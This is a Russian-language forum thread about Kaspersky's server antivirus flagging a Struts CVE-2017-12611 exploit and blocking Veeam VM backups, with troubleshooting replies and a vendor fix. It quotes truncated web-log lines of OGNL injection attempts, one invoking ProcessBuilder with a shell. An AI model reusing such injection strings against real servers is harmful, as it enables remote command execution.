KSWS блокирует соединение во время копирования ВМ с помощью Veeam

[rihansu]

На Windows сервере установлен KSWS 11.0.1 и Veeam. Во время копирования одной из виртуальных машин на линукс (Fedora) появляется сообщение: Intrusion.Generic.CVE-2017-12611.a.exploit и соединение  между сервером Veeam и хостом, на котором установлена ВМ, блокируется. При этом в логах ВМ содержатся записи с попытками эксплуатации данной CVE. 

2021:11:31:46 +0800] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_ ...

[04/Dec/2021:11:32:13 +0800] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','i ...

Записи еще за 2021 год, но сообщение о вторжении стало появляться только с 23 ноября. Возможно ли, что KSWS реагирует именно на эти записи или есть вероятность, что ВМ заражена? Что делать в таком случае?

[ywxvbmu]

То же самое, только во время использования Системы архивации в windows server 2019. Причем через раз архивация проходит успешно.

Edited April 5, 2023 by ywxvbmu

[ДенисНестеров]

Добрый день.

Кто решил данную проблему?

[Demiad]

@ДенисНестеров, добый день.

Попробуйте снять опцию "Восстанавливать атрибуты файлов после сканирования". Если детект прекратится, то так и оставьте.
https://support.kaspersky.ru/ksws/11.0/troubleshooting/15660

Если сохранится, то снимайте трассировки в момент срабатывания антивируса и GSI с событиями ОС отправляйте в поддержку ЛК:
https://support.kaspersky.ru/b2b/ru

[ДенисНестеров]

Проблему решили через ТП - прислали фикс для ВМ с бекапами, после которого ошибки перестали сыпаться.